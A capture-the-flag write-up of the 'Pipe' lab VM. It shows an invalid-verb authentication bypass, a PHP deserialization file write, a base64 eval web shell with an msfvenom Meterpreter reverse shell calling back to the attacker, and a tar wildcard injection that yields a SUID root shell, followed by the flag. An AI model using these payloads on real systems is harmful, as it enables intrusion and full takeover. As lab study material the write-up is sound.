published on in writeup
tags: /dev/random

/dev/random: Pipe

Pipe was a VM created by Sagi- for ZaCon. It’s quite a short VM, presumably to fit confortably in a con session - but it’s fun nonetheless!

Scan dem Ports

[email protected]:~# nmap -n -p- -A 192.168.56.102

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 16:48:50:89:e7:c9:1f:90:ff:15:d8:3e:ce:ea:53:8f (DSA)
|   2048 ca:f9:85:be:d7:36:47:51:4f:e6:27:84:72:eb:e8:18 (RSA)
|_  256 d8:47:a0:87:84:b2:eb:f5:be:fc:1c:f1:c9:7f:e3:52 (ECDSA)
80/tcp    open  http    Apache httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized
|_  Basic realm=index.php
|_http-methods: No Allow or Public header in OPTIONS response (status code 401)
|_http-server-header: Apache
|_http-title: 401 Unauthorized
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          33500/udp  status
|_  100024  1          36100/tcp  status
36100/tcp open  status  1 (RPC #100024)

Verb Abuse

Hop on over to the web service, and we’re blocked by an authorisation prompt.

If we intercept the traffic in burpsuite, you can see that the page being requested is index.php. After doing a bit of tampering, I found that you could bypass the authentication by using an invalid verb.

MEH /index.php HTTP/1.1
Host: 192.168.56.102

Next we see a page entitled “The Treachery of Images” - at the bottom of the page is a hyperlink that runs some javascript. Looking at the source, we see what is suspiciouslly like serialized data.

"O:4:\"Info\":4:"

Intercepting the POST request in Burp confirms this:

param=O:4:"Info":4:{s:2:"id";i:1;s:9:"firstname";s:4:"Rene";s:7:"surname";s:8:"Margitte";s:7:"artwork";s:23:"The Treachery of Images";}

Also within the source, is the location of some javascript serializing code - navigating to this directory, we find another file.

src="scriptz/php.js"
Index of /scriptz
    log.php.BAK
    php.js

Peeking at log.php.BAK reveals the code for the page - it’s reasonable to assume that this is a backup of index.php.

<?php
class Log
{
    public $filename = '';
    public $data = '';

    public function __construct()
    {
        $this->filename = '';
  $this->data = '';
    }

    public function PrintLog()
    {
        $pre = "[LOG]";
  $now = date('Y-m-d H:i:s');

        $str = '$pre - $now - $this->data';
        eval("\$str = \"$str\";");
        echo $str;
    }

    public function __destruct()
    {
  file_put_contents($this->filename, $this->data, FILE_APPEND);
    }
}
?>

We see that there’s a function that could enable us to write files to the web server - a prime opportunity to write a PHP shell. But first, we’ll try something simple.

<?php

class Log {

  public function __construct() {
    $this->filename = '/var/www/html/scriptz/test.php';
    $this->data = '<?php phpinfo(); ?>';
  }

  public function __destruct() {
    file_put_contents($this->filename, $this->data, FILE_APPEND);
  }
}

print serialize(new Log);

?>

We do have permission to write into the webroot /var/www/html as well as scriptz. Since scriptz allows us to list the directory, it makes it easier to know if our write has succeeded.

[email protected]:~# php put-file.php 
O:3:"Log":2:{s:8:"filename";s:30:"/var/www/html/scriptz/test.php";s:4:"data";s:19:"<?php phpinfo(); ?>";}

Now just copy this text as the value for param in the POST request. It’s easiest to do this via the Burp Repeater.

Index of /scriptz
    log.php.BAK
    php.js
    test.php

Go to test.php just to make sure it works…

Excellent - time to upload a shell. I opt for a Staged Meterpreter PHP payload, since it’s small and flexible.

msfvenom -p php/meterpreter/reverse_php LHOST=192.168.56.101 LPORT=4444 -f raw | base64 | tr -d '\n'

$this->filename = '/var/www/html/scriptz/shell.php';
$this->data ='<?php eval(base64_decode(\'Lyo8P3BocC[...snip...]BkaWUoKTs=\')) ?>';

Remember to escape your '.

msf exploit(handler) > run 

[*] Started reverse handler on 192.168.56.101:4444 
[*] Starting the payload handler...
[*] Sending stage (32461 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.102:48112) at 2015-10-02 21:26:16 +0100

meterpreter > getuid 
Server username: www-data (33)

Rene

After looking around the file system a bit, I spotted some files in rene’s home directory.

meterpreter > ls /home/rene
40777/rwxrwxrwx   4096  dir   2015-10-02 21:27:01 +0100  backup

meterpreter > ls /home/rene/backup
100644/rw-r--r--  98925  fil   2015-10-02 21:25:01 +0100  backup.tar.gz
100644/rw-r--r--  30263  fil   2015-10-02 21:27:01 +0100  sys-10582.BAK
100644/rw-r--r--  17323  fil   2015-10-02 21:27:01 +0100  sys-4811.BAK

After some time, we notice that sys-* files are created and removed periodically, and that the timestamp on backup.tar.gz changes. This leads us to believe some sort of scheduled job is running, so we go in search for cronjobs.

meterpreter > cat /etc/crontab

* * * * * root /root/create_backup.sh
*/5 * * * * root /usr/bin/compress.sh

meterpreter > ls /usr/bin/compress.sh
100755/rwxr-xr-x  190  fil  2015-07-06 02:12:03 +0100  /usr/bin/compress.sh

meterpreter > cat /usr/bin/compress.sh
#!/bin/sh

rm -f /home/rene/backup/backup.tar.gz
cd /home/rene/backup
tar cfz /home/rene/backup/backup.tar.gz *
chown rene:rene /home/rene/backup/backup.tar.gz
rm -f /home/rene/backup/*.BAK

So every minute /root/create_backup.sh is run, and every 5 minutes /usr/bin/compress.sh runs. This second script is world readable, so we can inspect it. What we see is a classic tar command injection vulnerability due to the wildcard. This backup directory is world writeable - so we can slap our exploit in easily.

I created a simple script that would copy sh and set the suid bit.

meterpreter > edit shell.sh
cp /bin/sh /tmp/sh
chmod 4777 /tmp/sh
(:wq)

meterpreter > edit "--checkpoint-action=exec=sh shell.sh"
(:wq)
meterpreter > edit "--checkpoint=1"
(:wq)

Sit back, and…

meterpreter > ls /tmp
104777/rwxrwxrwx  125400  fil   2015-10-02 21:30:01 +0100  sh

meterpreter > execute -f /tmp/sh -c -i
whoami
root

Flag

                                                                   .aMMMMMMMMn.  ,aMMMMn.
                                                                 .aMccccccccc*YMMn.    `Mb
                                                                aMccccccccccccccc*Mn    MP
                                                               .AMMMMn.   MM `*YMMY*ccaM*
                                                              dM*  *YMMb  YP        `cMY
                                                              YM.  .dMMP   aMn.     .cMP
                                                               *YMMn.     aMMMMMMMMMMMY'
                                                                .'YMMb.           ccMP
                                                             .dMcccccc*Mc....cMb.cMP'
                                                           .dMMMMb;cccc*Mbcccc,IMMMMMMMn.
                                                          dY*'  '*M;ccccMM..dMMM..MP*cc*Mb
                                                          YM.    ,MbccMMMMMMMMMMMM*cccc;MP
                                                           *Mbn;adMMMMMMMMMMMMMMMIcccc;M*
                                                          dPcccccIMMMMMMMMMMMMMMMMa;c;MP
                                                          Yb;cc;dMMMMMMMMMMMP*'  *YMMP*
                                                           *YMMMPYMMMMMMP*'          curchack
                                                       +####################################+
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       +----------------------------------+-+
                                                        ####################################
                                                             |======                  |
                                                             |======                  |
                                                             |=====                   |
                                                             |====                    |
                                                             |                        |
                                                             +                        +

 .d8888b.                 d8b          d8b               888                                                                    d8b
d88P  Y88b                Y8P          88P               888                                                                    Y8P
888    888                             8P                888
888        .d88b.  .d8888b888   88888b."  .d88b. .d8888b 888888   88888b.  8888b. .d8888b    888  88888888b.  .d88b.    88888b. 88888888b.  .d88b.
888       d8P  Y8bd88P"   888   888 "88b d8P  Y8b88K     888      888 "88b    "88b88K        888  888888 "88bd8P  Y8b   888 "88b888888 "88bd8P  Y8b
888    88888888888888     888   888  888 88888888"Y8888b.888      888  888.d888888"Y8888b.   888  888888  88888888888   888  888888888  88888888888
Y88b  d88PY8b.    Y88b.   888   888  888 Y8b.         X88Y88b.    888 d88P888  888     X88   Y88b 888888  888Y8b.       888 d88P888888 d88PY8b.   d8b
 "Y8888P"  "Y8888  "Y8888P888   888  888  "Y8888  88888P' "Y888   88888P" "Y888888 88888P'    "Y88888888  888 "Y8888    88888P" 88888888P"  "Y8888Y8P
                                                                  888                                                   888        888
                                                                  888                                                   888        888
                                                                  888                                                   888        888
Well Done!
Here's your flag: 0089cd4f9ae79402cdd4e7b8931892b7